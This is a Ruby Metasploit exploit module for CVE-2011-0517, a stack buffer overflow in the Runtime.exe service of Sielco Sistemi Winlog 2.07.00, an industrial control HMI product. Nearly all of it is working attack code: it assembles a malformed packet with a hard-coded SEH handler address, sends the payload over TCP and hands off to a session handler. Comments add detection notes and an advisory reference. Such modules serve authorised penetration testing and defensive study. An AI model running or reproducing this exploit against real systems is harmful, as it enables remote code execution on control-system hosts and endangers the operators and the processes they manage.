##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2011-0517, a stack buffer overflow in the
# Runtime.exe service of Sielco Sistemi Winlog <= 2.07.00 (an ICS/SCADA
# HMI product; see the CISA advisory in References).
#
# The module opens one TCP connection to the service (RPORT, default 46823),
# writes a single crafted packet and relies on an SEH overwrite to run the
# selected payload. Exactly one build is supported, via a hard-coded,
# build-specific handler address in the Targets table.
#
# Detection notes, taken from the packet assembled in #exploit: the request
# begins with the opcode byte 0x02 and the big-endian word 0x0101, followed by
# 588 bytes of upper-case ASCII filler and then the SEH record and payload.
# Those fixed leading bytes, the long upper-case run and the port are the
# network-visible features a defender can alert on; unpatched hosts should
# not expose this service beyond the control network.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  # Tcp supplies connect/sock/disconnect and the RPORT option;
  # Seh supplies generate_seh_payload.
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Registers module metadata (name, references, payload constraints, target
  # table) with the framework and declares the module's only option, RPORT.
  #
  # @param info [Hash] metadata supplied by the framework, merged with the
  #   values below via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sielco Sistemi Winlog Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in Sielco
          Sistem Winlog <= 2.07.00. When sending a specially formatted
          packet to the Runtime.exe service, an attacker may be able to
          execute arbitrary code.
        },
        'Author' => [ 'Luigi Auriemma', 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2011-0517' ],
          [ 'OSVDB', '70418'],
          [ 'URL', 'http://aluigi.org/adv/winlog_1-adv.txt' ],
          # Vendor-neutral advisory; the authoritative source for affected
          # versions and remediation guidance.
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-017-02']
        ],
        'Privileged' => false,
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
          # Post module run automatically when a session opens.
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
        'Payload' => {
          # Payload constraints: at most 450 bytes, and the encoded payload
          # must not contain NUL, space, LF or CR.
          'Space' => 450,
          'BadChars' => "\x00\x20\x0a\x0d",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          # 'Ret' is an absolute address inside the Winlog Lite 2.07.00
          # build and is used as the overwritten SEH handler; it is specific
          # to that build, so no other version is covered by this entry.
          [ 'Winlog Lite 2.07.00', { 'Ret' => 0x011946de } ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2011-01-13',
        # Reliability, stability and side effects have not been assessed.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # TCP port of the Runtime.exe service; overridable by the operator.
    register_options([Opt::RPORT(46823)])
  end

  # Connects to RHOST:RPORT, sends the single malformed packet and starts the
  # payload handler. No response from the service is read or validated, so
  # the module cannot tell a patched host from a vulnerable one; it simply
  # reports the attempt via print_status.
  def exploit
    connect

    # Packet layout: 1-byte opcode, 2-byte big-endian field, 588 bytes of
    # upper-case alpha filler that reaches the SEH record, then the
    # SEH record plus payload produced by the Seh mixin for target.ret.
    data = [0x02].pack('C') # opcode
    data << [0x0101].pack('n')
    data << rand_text_alpha_upper(588)
    data << generate_seh_payload(target.ret)

    print_status("Trying target #{target.name}...")
    sock.put(data)

    # Hand off to the payload handler, then close the socket regardless of
    # whether a session was obtained.
    handler
    disconnect
  end
end